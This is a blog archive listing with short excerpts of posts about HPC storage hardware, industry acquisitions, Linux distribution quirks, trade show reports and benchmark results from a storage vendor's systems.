This article notes that Violin has divested itself of its PCIe flash card. This card was, to a degree, a shot across the Fusion IO/Virident/Micron bows. I don’t think it ever was a significant threat to them though. Terms of the sale indicate about $23M cash and assumptions of $0.5M liabilities, as well as hiring the team. What is interesting is where it was sold. Hynix. Yes, the memory chip/flash maker.
Posts
M&A: Seagate acquires LSI's flash and accelerated bits from Avago
I’ve been saying for a while that M&A; is going to get more intense as companies gird for the battles ahead. I see component vendors looking at doing vertical integration … not necessarily to compete with their customers, but to offer them alternatives, reference designs, etc. and capture a portion of the higher margin businesses. This move gives Seagate control over Sandforce controllers, and PCIe flash. See this link for more info.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/ Filesystem Size Used Avail Use% Mounted on fhgfs_nodev 1.
Posts
Insanity in vendor distros
I am not sure if this is specific to SuSE (customer requirement, don’t ask), but there is some extreme … and I really, positively mean, EXTREME … boneheaded insanity in the dhcp stack in the initrd construction in SuSE. Something that doesn’t lend itself well, to, I dunno … CORRECT AUTOCONFIGURATION OF NETWORK PORTS IN DISKLESS ENVIRONMENTS. Ok, what clued me in was this snippet from the console I’ve been struggling with for the past day.
Posts
io-bm released
At long last, and yes, I can’t believe I let this slip for years … Its available here at our git site
Posts
Our new look and feel
Day job website has been updated to something … modern. Hopefully nothing is broken … I think it looks great; the Dougs did a terrific job. Seriously, I wound up breaking DNS at the day job (by accident … really) yesterday, in order to try to rationalize something. Had to roll back our DNS servers to an older code drop. That and I had to spin up a new dedicated mail/dns internal server.
Posts
Building efficient storage and computing platforms has little to do with using cheap hardware
This has been bugging me for a long time, and we have to address this in every discussion we have. You can’t build cost effective scale out systems on cheap-ass hardware designs. Its woefully inefficient, the cost blows up to achieve the type of performance we can achieve often with an order of magnitude fewer systems (hey … thats less acquisition cost, less TCO, less power/cooling, lower management strain, smaller footprint, tastes great, less filling, …) The only way people recognize this is when they actually try it themselves.
Posts
M&A: Inktank acquired by Red Hat
I am happy for Sage and team, this is a good exit. Obviously we didn’t know this was happening, but I guessed something like this a few weeks ago. Bigger picture: Open source technologies have been capturing mindshare from closed source object, file, and block for a while. This will serve to massively amplify this. GlusterFS was niche until Red Hat bought it. Then it went mainstream. Ceph isn’t GlusterFS though.
Posts
When ideology trumps pragmatic design
Real differentiation, adding real value to something, is often hard to do. Fundamental changes often take time, and are often incremental in scope, so they don’t break everything. That is, unless you are so completely convinced that your way is better, that you try to force the market in that direction. Sometimes these gambits work. Sometimes they don’t. This is about one that did not work. I am convinced my Mac OSX laptop may be the best laptop I’ve used.
Posts
busy last two weeks, and lots of traveling next two weeks
We’ve been cranking out the products to ship to customers, and I’ve been fretting over tests, as usual. And I finished my initial pass at the automated installer. It builds our new Debian based systems very nicely, though there is still a little human interaction. Working on it. And it should work perfectly for all Ubuntu as well. Have an install in Hollywood this week. New market for us, very interesting and it plays completely to our strengths.
Posts
when the networking revolution comes, the cheap switches will be the first ones against the wall
Seriously … no more cheap switches as the central point of information flow in storage or computing clusters. The money you save will be blown in the first hour you pay for down time or architectural changes you need to actually move your data without tossing packets on the ground … … because while standard network codes don’t care so much if they need to retransmit or lose data, cluster file systems get very … very … testy when data doesn’t arrive when and where it is supposed to, in the right order, because the cheap-ass switch was too busy tossing packets on the floor.
Posts
Slides from HPC on Wall Street Spring 2014 are up
See here. Very good conference, lots of good discussion.
Posts
hate to be an alarmist, but Heartbleed is worse than I had thought it was
TL;DR: Run, as in now, before you finish reading this, to update vulnerable OpenSSL packages. Restart your OpenSSL using services (ssh, https, openvpn). Then nuke your keys, and start all over again. Yeah, its that bad. I had hoped, incorrectly, that no one would start asking, “hey, can we exploit this in the wild?” any time soon. Unfortunately … exploits are live and out there. Have a look at this session hijacking done using the bug.
Posts
Sometime things work far better than one might expect
The day job builds a storage product which integrates Ceph as the storage networking layer. What happened was, in idiomatic American English: We made very tasty lemonade out of very bitter lemons. For the rest of the world, this means we had a bad situation during our setup at the booth. 3 boxes of drives and SSDs. 2 of them arrived. The 3rd may have been stolen, or gone missing, or wound up in a shallow grave somewhere.
Posts
Sometimes the right level of caffeination helps in work
I had an opportunity to review an old post I had written about playing with prime numbers. In it, I wrote out an explicit formula for a number, expressed as a product of primes. This goes to the definition of a composite or a prime number. Whats interesting is what leaps out at you when you look at something you wrote a while ago. Looking at the formula I wrote down, there is a very easy way to define if a number is prime or composite.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
Negative latencies
I’ve been thinking for a while that our obsession with reduction of latency in computing and storage could be ameliorated by exploiting a negative latency design. A negative latency design would be one where a hypothetical message would arrive at a receiver before the sender completed sending it. There are a few issues with this. First off is how on earth, or elsewhere, is this possible? Second, aren’t there issues with causality violations?
Posts
HPC on Wall Street session on low latency cloud
See here for the program sheet. The session is here: HPC on Wall Street Flyer Description is this:
Wall Street and the global financial markets are building low latency infrastructures for pro- cessing and timely response to information content in massive data flows. These big data flows require architectural design patterns at a macro- and micro-level, and have implications for users of cloud systems. This panel will discuss, from macro to micro, how new capabilities and technologies are making a positive impact.
Posts
Intel ditches own Hadoop distro in favor of Cloudera
Last year, Intel started building its own distro of Hadoop. Their argument was that they were optimizing it for their architecture (as compared to, say, ARM). Today came word (via InsideHPC.com) that they are switching to Cloudera. This makes perfect sense to me. Intel couldn’t really optimize Hadoop by compiler options to use new instruction capability (part of their selling point), as Hadoop is a Java thing. And Java has its own VM, and many performance touch points that have nothing to do with processor architecture.
Posts
Nice interview with Freeman Dyson
Freeman Dyson is an incredible scientist. I imagine he, Terrance Tao, Paul Erdos and a number of others are all woven from the same cloth. Dyson has done some amazing work, and probably will do some more amazing work. The interview is here. One of the comments he made really struck me as being dead on correct …
I’ve used similar language, describing a Ph.D. as a union card. And I agree it takes far too long in physics.
Posts
Free market forces at work, the way they should be
There’s a much publicized (in SV) trial going on over an oligarchic wage suppression scheme that was in force between a number of big players in SV. Apart from Facebook that is. Techcrunch has the details. What transpires when free market forces are allowed to work with their invisible hands unconstrained? Simple.
Kudos to facebook for doing the right thing, though in all honesty, I don’t attribute this to being altruistic on their part.
Posts
Staring into voids that stare back
I had mentioned this in my write up about our 10 year anniversary.
And this post yesterday from Scott Weiss at Andreessen Horowitz
Its in that staring deep and hard into the yawning void that one gets their inspiration. Call it sheer abject terror, or motivation. Whatever. It juices your processors into overdrive if you are an entrepreneur. You are at your most creative when you are at your most fearful.
Posts
Good read on ageism in SV VCs
Oddly enough at the New Republic. Article is here. I was somewhat amused by the read, but some of it rung quite true. Its nice to hear of more of the signals one needs to read VC tea leaves. They never say no, but they do move goal posts, always outward, always away from you. The article implies they get hung up on TAM, as a proxy for what they really think.
Posts
Unicode and python 64 bit build
[Update] I gave up on 2.7.x. Nothing I did made it work. I removed all the options apart from prefix for compilation of 3.4.0. That worked. Now onto building ipython, ijulia and other good things (SciPy stack). We will use 3.x going forward rather than try to remain compatible with 2.x. Updating our tool chain to include a modern python which will be outside of the distro version. Long … long experience dealing with distro based tools are that they are usually … badly … out of date.
Posts
SIOS Inst
Ok, I am taking the leap. I’ve started working on the SIOS Inst system. Basically, after reviewing everything thats broken (and for that matter unfixable) in the anaconda, debian-installer, and other installation mechanisms, I’ve decided that for our purposes, the only way that we are going to get correct and reliable builds for stateful systems is to forgo these systems advanced installation mechanisms. If we can skip the code entirely, we will.
Posts
HPC on Wall Street
Not only do we have a booth, but we are sponsoring a session on Low Latency Cloud and Big Data. Roosevelt Hotel in NYC on 7-April. See the site for more details. If you’d like to attend and need a pass, please contact me at the day job. Our partners Lucera, Inktank, and Pluribus Networks will be there with us. Possible more.
Posts
Not so fast ...
Well, after nearly a decade of hooplah over a realization of a quantum computer, an interesting study found that it was
There are a few important elements of this … it uses 1/5th the number of qubits that the newer generation machine used. But it wasn’t, as earlier reported, thousands of times faster.
Way back in the day, when working on benchmarking big machines, and comparing performance, one of the major criteria was using identical (or as near to identical) algorithms as possible to assess machine speed, compiler quality, etc.
Posts
Which (computer) language to learn next?
Ok, I have as one of my professional goals, to learn a new computer language. I am at master level in several, proficient in others, and have working knowledge of a fair number. I’ve forgotten more than I care to admit about some (Fortran, Basic, C/C++, APL, x86 Assembler). The contenders for me should be useful languages. These are not things that should be learned for the sake of learning, but for real useful purposes.
Posts
OT: AirBnB and their issues
Ok, this one is sad. Saw this linked off of hacker news. I am not sure if this is satirical, humorous, or real. It doesn’t quite matter though. We’ve used AirBnB twice now. And we have a firm policy, as a direct result of those very negative experiences, of never … ever … using it again. To be fair, AirBnB is effectively a market maker dealing with the commodity of unused space which could be turned into a profitable asset.
Posts
Playing with several noSQL/document/tuple/time series DBs
We’ve been using MongoDB for a while for a number of things, internally, and thinking about using it for Tiburon as the restful interface. It has some nice aspects about it, but it also has some known issues for larger DBs. Considering what we want to do for some of our work, these larger DB issues are potentially problematic for us. Basically, MongoDB is one of the class of mmap’ed DBs.
Posts
Retired Apache as web server
This has been a long time coming for me. I’ve been using Apache in one form or another since the 90’s. I’ve never found it easy to configure, and often ran into maddening bugs in the config files and how they interacted with the server itself. I’d taken a long time to evaluate the various alternatives. Lighttpd caught my fancy for a while, but I ran into similar problems with config.
Posts
Couldn't have said it better myself ...
Robin at StorageMojo has an interesting article up (right after the one about Violin maybe being dead). I won’t comment on that second one, other than to say I disagree with his analysis and conclusions. As the day job is nominally a competitor (we’ve seen them in a deal, once) I am biased. But the fundamental analysis simply doesn’t look good for them (or Fusion, or …). They need a larger player to buy them.
Posts
The resurrection of autoinst ...
A long time ago, in a galaxy far, far away … I worked for this company named SGI. SGI machines and software were awesome … I had used them (R3k and R8k) for doing calculations for my thesis. Very very fast. But very hard to install/manage. In fact, brutally hard. This was not lost on customers with many of these devices. One of those customers read SGI the riot act on this.
Posts
Good read on the faux-STEM shortages
Good post over at Math Blog. There is no short of STEM folks in the US, and hasn’t been for a long … long time. Any shortage of STEM folks would be well represented by a number of economic factors: 1) rapidly rising compensation rates (economic scarcity impacts upon costs of labor), 2) very short job search times for STEM folks, 3) additional market based initiatives to find and retain STEM folks.
Posts
Reality vs what one might like
Many years ago, I had this thought in my head that I wanted to be a physics professor. No, really. I went through all the motions. Undergrad BS, then MS and then PhD. While I was doing this, the Soviet Union collapsed. How was that fact related to my former desire to be a physics prof? Simple. Its economics. Its always economics. Anyone tells you differently, they are either lying or selling you something.
Posts
Just created a new external dns on Digital Ocean
About 2 years ago, we had an issue with an internal server blowing up, taking data and config with it. I resolved to place some of our core infrastructure (external DNS, etc.) beyond our virtual boundaries, so we could maintain email/web presence in the event of a power or server issue. This has proven to be a prescient and wise move. We started out on Amazon with their small instances. And started out with dnsmasq, as I didn’t want to re-learn bind and all that config.
Posts
Our second(!) Unison FhGFS based unit
Burning in … Hammering on all disks, while computing pi, e, sqrt(2), … It is a thing of beauty …
[ ](/images/unison.png)
First one was an Isilon replacement. We seem to have many more of these in queue.
Posts
A must-read on HD selection
Henry could probably write far more in depth about this subject than he did. Regardless this is a must-read article. Now it is important to understand where you can use each technology, and Henry does a great job of explaining some of these. However, its important to note that as some of the file system and device bits are pushed into higher levels in the stack, some of the functionality becomes redundant at the lower levels.
Posts
Big blue blues?
I remember my two stints at IBM T.J. Watson very well … first as a summer student (college hire for summer), and then as an engineer after finishing undergraduate. It was a wonderful place. I really enjoyed it. Not simply computer nerd heaven, but physical scientist nerd heaven as well. IBM famously was the company that resisted layoffs and downsizing for a long time. But it eventually gave in, and was forced into RIF actions during their troubled times in the 1990’s and 2000’s.
Posts
In 18 months ...
… I’ll have hit 10 years of blogitude … bloggerisms … er … generation of large amounts of noise and heat, and hopefully at least a little light? Mebbe?
Posts
Excellent article on Lucera's financial cloud
… that the day job is building atop our siCloud platform. In the article (definitely read it!) there is an great discussion about what the fundamental differences are between what Lucera is aiming for and what more traditional commodity cloud vendors are focused upon. When it comes down to it, the difference is architecting for density of VMs in the commodity cloud versus architecting for performance and low latency in the performance cloud (Lucera’s).
Posts
Does fibre channel have a future?
Strange question. Its really a question about block storage in general than FC in particular, but I have a sense that FC may be the first to go down as it were. Ok … I’ve been looking up mechanisms to help customers in a media editing environment. Their preferred file system depends, to a degree, upon IP over FC for connectivity. They need to interconnect Mac OSX machines, Linux and Windows machines to the same storage resources.
Posts
The end of an era
Posted to the xfs list:
SGI is stepping out of maintainer roles for xfs, xfsprogs, xfsdump, and xfstests. This removes me from the MAINTAINERS entry. Signed-off-by: XXXXXXXXXXXXXX --- [SGI will continue to host oss.sgi.com as a repository for the XFS open source git trees, mailing list, and documentation as is provided today. And will also continue to participate in a less formal role.] Thanks! -Ben MAINTAINERS | 1 - 1 file changed, 1 deletion(-) SGI the original creator of xfs, almost 20 years ago, is removing itself from the pathway going forward.
Posts
Updates: been busy, but here are a few
We’ve sold our first Unison storage cloud to replace an Isilon unit for a bioinformatics core. Performance and density matter, and we have both. About to deploy next phase of cloud for one of our partners … Setting up an exciting trade show presence … Working on an extension of what we’ve been wanting to build for a long time … and now it looks like its in reach. Oh … my … this is huge …
Posts
The state of HPC tier 1 vendors
Much has been happening in the HPC tier 1 vendor space. Some of it has made the news, much has not. The TL;DR version: I believe that most of the tier 1 HPC capability may have been wiped out over the last few months. 1 tier 1 and a bunch of tier 2 are left. Basically, the HPC market has a number of tiers within it, and product mixes across these tiers.
Posts
Lyrical offspring
I can’t name her, at her request, but this is my progeny singing for her high school battle of the bands. They took second place.
Fantastic job, offspring of mine!
Posts
The changing face of storage
Over at InsideHPC, Rich pointed to an blog by Henry Newman about the changing face of SSD. I’d argue that its not just SSD, but storage in general. But Henry, as usual, nails it. Henry opines
To a degree, we see them at least investing in the technologies behind the up market devices. At “worst” acquiring them. Because as Henry points out
Very much so. Look at Seagate and WD with their micro NAS appliances.
Posts
On those annoying full page non-scrollable javascript ads on pages
Guys, please, seriously, stop that. They don’t work on mobile or desktop devices when the window size is smaller than the area required to see the [X] Close button. Whom ever came up with this, it is a bad idea. Stop it now. Before I get pissed off enough to write a web proxy that specifically filters out such stupidity, or purposefully renders that to an offscreen invisible layer which is forced to be non-modal.
Posts
An offer for the day job's customers in financial services
See here. TL;DR version: A free month on Lucera’s cloud.
Posts
OCP thoughts
I didn’t post a response to the article written a little more than a year ago claiming that OCP had “blown up the server market”. Yes, that was really in the title. I’ll ignore most of the obvious issues with this, but lets review a year later, shall we? Open hardware designs are great in concept. Share your design with the world, and lower your customers costs … er … whoops.
Posts
IBM's sale of x86 servers and networking to Lenovo
I’d waited a while before posting on this for a number of reasons, not the least of which was I was quite busy. But also, I wanted to understand what was and was not sold. Now that some of the dust has settled, and both companies have publicly discussed this, we know pretty well what is included in the sale. I don’t need to get in to that aspect, you can read it all very succinctly on Lenovo’s site.
Posts
The last straw for us for gluster
We’ve had customers migrating off of it for the past few years, as bugs have gone un-addressed, reports closed, and discussions cut off or ignored. Its costing us too much in support time and effort now. Its time to pull the plug. I like many things about gluster. Really I do. I’ve been a strong proponent of it long before it was cool to do so, as the design was in line with what I thought was needed to build scale out file systems.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Something has been bugging me about the CentOS absorption by Red Hat
I am obviously not a lawyer, and I’ve not consulted one. Feel free to point out my mistakes, and note that this is not legal advice. You need to speak to a lawyer on that, I am just guessing. The language on here is pretty clear as to what Red Hat owns. I have no problem with their ownership of it. Nor do I have a problem with them imposing their particular concept of ownership.
Posts
Yay, latest Java update broke Supermicro remote console
JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. Its the applet the needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though its useless for remote support ops. Doesn’t set off the signed issue. Mebbe they ignore signing? Which is worse … the self signed cert, or the sign ignoring app.
Posts
An analytical takedown, gone awry
See here which is the response to the arvix article here. While the Facebook data scientists refer to their post as a debunking, using irrelevant metric (enrollment vs google rank? and the theory behind this is … what?), the paper points out something quite important. Social networking success has been largely ephermal, and not sustainable. Its a transient phenomenon. Anyone remember Friendster? MySpace? More to the point, the internet entities that dominated 15 years ago are largely gone.
Posts
When bugs attack ... the case of the ever expanding VirtualBox image
So I’ve got a Mac Mini and a Linux machine on my desk at work. I am trying hard to use the Mac Mini for day to day stuff, but the sheer broken-ness of the keyboard (yes, really) for Mac’s is driving me near batty. I am trying though. (Hint to Apple: You aren’t better at everything, and most especially not keyboards and interfacing to higher quality Logitech keyboards, you almost completely fail … don’t even get me started on mice …).
Posts
CentOS™ merges with Red Hat
See this page for more. Inclusive of this merging is a new set of requirements for using the word CentOS. Since we ship an updated and modified kernel, and we update and modify packages to reflect our needs, we are going to have to alter our “CentOS derived distribution” statement. Or switch to another distribution. Its an annoyance, but maybe its time to revisit the distribution scenario. I see nothing wrong with using Debian as the basis, and building from there.
Posts
Blocking hacker probes
I honestly no longer even write a nice note to their ISP. I just tend to block the whole ISP from reaching our site(s). Its easier, and lower pain for us. Definitely saddens me that we have to do this, but I see enough probes in our logs that I have to.
Posts
Fixed the IPoIB performance issue
For our Unison Parallel File Systems Appliance:
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 ------------------------------------------------------------ Client connecting to 10.3.1.1, TCP port 5001 TCP window size: 1.00 MByte (default) ------------------------------------------------------------ [ 3] local 10.3.1.2 port 48383 connected with 10.3.1.1 port 5001 [ ID] Interval Transfer Bandwidth [ 3] 0.0-10.0 sec 13.5 GBytes 11.6 Gbits/sec and of course in parallel
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 -P2 ------------------------------------------------------------ Client connecting to 10.3.1.1, TCP port 5001 TCP window size: 1.
Posts
A network we can work with ...
A Unison file system appliance connected with Infiniband and 10GbE.
[root@unison-jr4-2 ~]# qperf 10.3.1.1 rc_bi_bw rc_bi_bw: bw = 9.7 GB/sec [root@unison-jr4-2 ~]# qperf 10.3.1.1 ud_lat ud_bw ud_lat: latency = 3.66 us ud_bw: send_bw = 4.9 GB/sec recv_bw = 4.9 GB/sec and of course, IPoIB
[root@unison-jr4-2 ~]# qperf 10.3.1.1 tcp_bw tcp_lat tcp_bw: bw = 474 MB/sec tcp_lat: latency = 13.4 us which, if you run the same thing over a pair of good 10GbE ports …
Posts
M&A continues ... Xyratex bought by Seagate
The story is in the Register. An immediate question, and one of somewhat deja vu (all over again) … what is the impact upon Lustre IP? Xyratex had announced that it obtained ownership of the Lustre IP from Oracle a few months ago. This IP was in the form of trademarks, and a number of related bits. Now Xyratex has been bought. And if it keeps the Lustre HPC bits, it will be directly competing with its customers.
Posts
The evolving market for HPC: part 1, recent past
I’ve said this many times, and at many different venues. HPC drives downmarket, and does so very hard. High cost solutions have limited lifetimes, at best. At worst, they will not catch on. 2013 was the year of the accelerators. We predicted this many years ago. I won’t beat this dead horse (for us). I’ll simply say “we were right”, and right with great specificity and accuracy. This seams to be a pattern with us.
Posts
Prognostications for 2014 from an expert
Not me. Henry Newman at Enterprise Storage Forum. See articlehere. His first prediction of more consolidation in the SSD space is a given. I’ve been arguing that for a while. On the fab side, there are what … four producers left? Toshiba/Sandisk, Samsung, Intel/Micron, Hynix? Did I miss anyone? Will any of them leave (voluntarily or otherwise)? I think the SSD space that will really consolidate is on the SSD-as-a-rack-appliance side, as well as on the card side.
Posts
M&A: Avago grabs ... LSI ... ?
Avago, a spinout from Agilent which was a spinout from HP, just bought LSI. Avago is largely a supplier of components to a variety of industries, dealing with modules, optoelectronics, etc. If you look at their product mix, you see effectively zero overlap with LSI. They are not even in, arguably, the same markets. I am scratching my head over this one. I could see it as a play to gain a foothold into the storage space.
Posts
First new Unison product sold
We were showing off the Unison units at #SC13, and while on the show floor, we managed to sell a storage cluster. Well, technically, the sale occurred after the show (last week in reality), but most of the configuration back and forth was during the show. I can’t say anything about the configuration or stack on it … yet … but you’ll be hearing about it fairly soon. Its one we talk about quite a bit.
Posts
Violin's (and other pure flash array vendors) post IPO struggles continue
There’s a story on The Register right now about Violin Memory losing its CTO. But that’s not the real interesting story. In the article, Chris Mellor does a pretty good job of laying bare the issues around Violin.
There are several different threads running through this. First, they don’t have much real software IP. Their hardware IP is a different story, but fundamentally, we’ve found that its best to have a very simple and effective hardware design, coupled with intelligent software.
Posts
The most popular data analytics language
… appears to be R
[ ](http://revolution-computing.typepad.com/.a/6a010534b1db25970b019b00077267970b-popup)
This is in line with what I’ve heard, though I thought SAS was comparable in primary or secondary tool usage. This said, its important to note that in this survey, we don’t see mention of Python. Working against this is that it is a small (1300-ish) self-selecting sample, and the reporting company has a stake in the results. Also of importance is that R is a package with an embedded programming language, and Python is a programming language with add-ons.
Posts
And the SC13 video from InsideHPC is up
As usual Rich and the team at InsideHPC have done a tremendous job. If you don’t know InsideHPC and its sibling, InsideBigData, I highly recommend both publications. They are on my go-to list as information sources/summaries. The video shows a well caffinated Joe, talking through our new products. The problem for us was there simply wasn’t sufficient time to go into detail on everything. Which is a shame IMO, but one we’ll look at rectifying later.
Posts
The 60 second guide to big data by gogrid
The GoGrid folks have put together a nice marketing slide on big data, in the sense that they are explaining the features of it without explaining it, or how/where they fit. Its implied that they provide all you need for Big Data, but its their points along the way that make a great point for the day job and especially our new Fast Path Big Data Appliances. Our argument has always been that you can’t approach Big Data with last millennium’s architecture.
Posts
Big data languages: the reason for the tests
In a number of recent articles, I’ve seen/read that “Python is displacing R”, and other similar things. Something about this intrigued me, as I had heard many years ago that “Python was displacing Perl”. Only, it wasn’t. And others are questioning the supplantation premise quite strongly. It seems that there is little actual evidence of this. Mostly hyperbole, guesses, and dare I say, wishful thinking. It seems that this is modus operandi for Python advocates, and their latest object of attention is R.
Posts
Riemann zeta function in parallel/vector data languages
Continuing the work of the previous post, I looked into rewriting the serial code to run in parallel/vector data languages. My original supposition about what would make a good data language is now in doubt as a result. First, I used PDL in Perl. But its Perl, right? It can’t possibly be fast. That would be … like, I dunno … wrong? (yes, this is sarcasm). This completes the task in 12s.
Posts
Knights Landing
Over at InsideHPC, Rich has a short take on Knights Landing with a link to the longer article. This is implicitly the direction I thought things would be going in … drop in replacement CPUs to provide acceleration. Probably some big-small designs to handle OS tasks on specific cores (and reduce OS based jitter). This said, 2x such sockets gets you to 72 lanes of PCIe gen 3. A little light for us, but we’ll figure something out (our current units are more than this).
Posts
... and OCZ goes down
see here This is a chapter 7, dissolution, not a chapter 11 restructuring. Assets to be sold, likely to Toshiba.
I expect more of these from other vendors. SSD space has been needing a consolidation for a while. STEC purchased by WD, Smart by Sandisk has removed most of the high end of the market from the startup side. Pliant was grabbed by Sandisk previously. Whom else remains? On the low-midrange of the market, you have Intel, Micron, and a few others.
Posts
I guess no one at the beobash saw the 10% discount link ...
Basically, if you go to this site, provide your information, use the code “beobash13”, you get a nice discount on your next purchase from Scalable Informatics until the end of 2013. The rules are simple. Basically you provide your contact information, let us know what products you want to talk about, buy them and pay for them by the end of the year. We are offering something like a 10% discount for this.
Posts
Finally have a customer information page talking directly to zoho crm
This took a bit, as the API is documented, but wasn’t quite working for some reason. But now we’ve linked our signup page to drop data directly into zoho. This was made harder by the XML based API not working as documented. I posted a forum note, after searching on the forum for answers. Others had the same questions. I built a simple testing code, and it didn’t work. Posted this to the forum.
Posts
SC13: the Limulus boxen appear
[Disclosure: we do have a business relationship with Basement Supercomputing] (this is a longer version of the beowulf item I posted) Years ago, I came to the conclusion that there was no personal supercomputing market after we tried with a deskside system … what I called a “muscular desktop” with a great deal of IO, processing, ram, and graphics. We just could not find the right niche for this, and we were being badly undercut in price by the Dell-like companies of the world, selling low end boxes that were … good enough … for a small set of tasks.
Posts
SC13 observations
From a post to the beowulf list:
I didn’t get a chance to see many booths … I did get free the last hour of Thursday to wander, and made sure I got to see a few people and companies. What I observed (and please feel free to challenge/contradict/offer alternative interpretations/your own views) will definitely be colored by the glasses we wear, and the market we are in.
not so many chip companies (new processor designs, etc.
Posts
SC13 finale
That was a wonderful show. People got to see what we were about, our new appliances, our performance. I see many possibilities. This is good. Some key takeaways:
We have the fastest densest systems in market. Our usable performance far outpaces our nearest competitors configurations which are not in a reasonable config (hello … 60+ raw JBOD? or RAID0 … seriously? And no one has challenged them on this?) our partners rocked.
Posts
SC13: Day 2 wrap up
Day 1 was incredible. Day 2 topped day 1 by a fair amount. I had realized yesterday that I had forgotten to put up our speedometer website which pulled data directly from the siFlash hardware on the real IO performance. I had this unit running hard, and the IO operations were moving quite well. So I put up the web page on my laptop, and this is what we saw 30GB/S.
Posts
An apology
When I mess up, I don’t normally do it in a small way. I jump in hard, head first. I made an assumption about something I did not have all the facts about today, and began to tear into someone whom did not deserve this treatment, after making him wait for me at our booth. Yeah, this was a major screw up on my part. Addison, I hope you will forgive me, and accept my humble apology.
Posts
SC13 day 1 wrap up
A good day at the booth. The talks were well attended, and speakers and their topics were interesting. Our partners in the booth: Kx, Veristorm, Basement Supercomputing, Sandisk, XtremeData, and Inktank are phenomenal. We announced many new products, all on display at our booth, and the partners working with us on these products were there to talk about the applications. What we didn’t show off were the speedometers measuring the performance live on the systems.
Posts
Interesting article
I read this on Gigaom. In it, there is a claim of the densest storage on the market coming from Quanta, and a full rack of them would be about 3/4 ton (about 682 kg). Amazon uses a “special” design that comes in more than a ton according to the article. So I decided to look into what a simple 42U rack of say 10 of our bad boys would come out with weight wise.
Posts
Broken APIs and other time wasters
So I spent the day trying to figure out why my simple form submission which then generated an XML output, and then a subsequent post to Zoho CRM, did not, in fact, work. I was doing this without the Zoho code, just a description of their API. Its an older API, that much is obvious. You talk to it through XML. You post your XML. But you put parameters on the URI to control the post.
Posts
Sneak peek at UI atop RESTful API
This is our new, common UI across all machines, clusters, clouds, appliances, tiburon/Scalable OS … This one in particular is running atop our siRouter. More on that soon, but have a little gander.
[ ](/images/SOS-v1.png)
The UI is basically a “thin” layer atop the RESTful interface. And its a proper RESTful interface, none of this conflated GET where we mean POST/PUT and all that. More at SC13. I promise.
Posts
kvm incompatible with xfs
Just found this out by way of an experiment for a partner. Cool partner, cool product, running on our fast hardware for SC13. Problem is that I was seeing some very odd error messages when I tried to mount a volume stored in a file on an xfs based LUN. I could dd to the file. I could mkfs.ext* the /dev/vda. But the moment I tried to mount it, block errors.
Posts
BeoBash13: the revenge of the rampaging physics-turned-supercomputer geeks?
Or something like that. See here We’ll be there!
Posts
SC13 T-14 days
We will be at booth 1919. Please do come by and say hello. We’ll have coffee/tea (I think), a number of machines, great partners with a number of demos, and hopefully some talks on big data analytics in Financial Services, Parallel high performance databases, massive key-value storage and processing, as well as a few other bits. We’ll have a very cool box from one of our friends in the booth. We ship the machines at the end of this week, or beginning of next.
Posts
And then they fight you
We’ve been championing the tightly coupled storage and computing model for a long time. When it was unfashionable, when it was discarded as “this is something you should not do” by others “who knew better”. Now, the ideas, the concepts, the thoughts, the designs and implementations behind it are all around. Joyent’s Manta system is an implementation of the concept. Arguably, the more advanced MapReduce and Hadoop designs are also implementations … have the data right next to the processing, and provide gargantuan bandwidth locally to the data.
Posts
Cray acquires the IP assets and people of Gnodal
We used Gnodal units for the original Lucera system. Very nice devices with a few idiosyncrasies. Gnodal ran into some funding problems earlier this year, and had to find a buyer. Cray grabbed them and a number of the people involved. This is good for Gnodal and Cray. Gnodal has interesting technology. And Cray may be looking at how to leverage SDN for its system using this (wild guess on my part, I have no knowledge direct or indirect of their plans/intentions/…).
Posts
First distributed file system for STAC M3 benchmarks
We ran the STAC M3 on a Ceph based storage cloud appliance you will be hearing more about soon. The report should be up on the STAC site later this week. Here are some of the take-aways:
We chose Ceph for several reasons, but you should expect to see others very soon as well. Our Cluster and Cloud storage appliances are based upon our very powerful and very dense building blocks.
Posts
At the STAC Summit in NYC, presenting our Time Series Analytics Appliance
This was a good meeting in general. Lively panelists, focused panels, though somewhat vendor heavy in a number of cases. I have a sense of a “Gandhi” experience in progress from the parallel file systems panel. 4 vendors, one user. The user was fantastic, and the vendors were pushing most of their own stuff. One vendor in particular took some not too thinly veiled shots directly at us without naming us.
Posts
But, of course
So I ran out of space on my travel laptops small SSD. I wanted to update to a larger SSD, and I figured I’d move my partitions over and resize. But the gods would not allow for such an operation as they have in the past. Oh no. Upon switching out the 120 GB Intel SSD for the 240 GB SSD (spare unit we had), and putting the 120 GB SSD into a USB 3 holder, I discovered that a) the drive wouldn’t register with the machine most of the time (it errored out during SCSI plugin detection), or b) when it did detect properly, it wouldnt provide partitions I could copy off.
Posts
Our little time series analytical appliance is one fast monster
Running some burn in testing:
Run status group 0 (all jobs): READ: io=523296MB, aggrb=12093MB/s, minb=12093MB/s, maxb=12093MB/s, mint=43274msec, maxt=43274msec WRITE: io=523296MB, aggrb=7469.4MB/s, minb=7469.4MB/s, maxb=7469.4MB/s, mint=70059msec, maxt=70059msec More soon
Posts
This week past has been (mostly) incredible
Feeling not happy about my time away from my family, and not happy about Vipin’s time away from his, we still accomplished a great deal. Some unhappy things I still have to deal with, and I will soon. But this has been a great week. Look for some announcements around the SC13 show. We will have some nice things to talk about at our booth (#1919 , please do come and visit us there, we will have coffee, snacks, as well as our team, partners, and friends there!
Posts
And the benchmarks are out
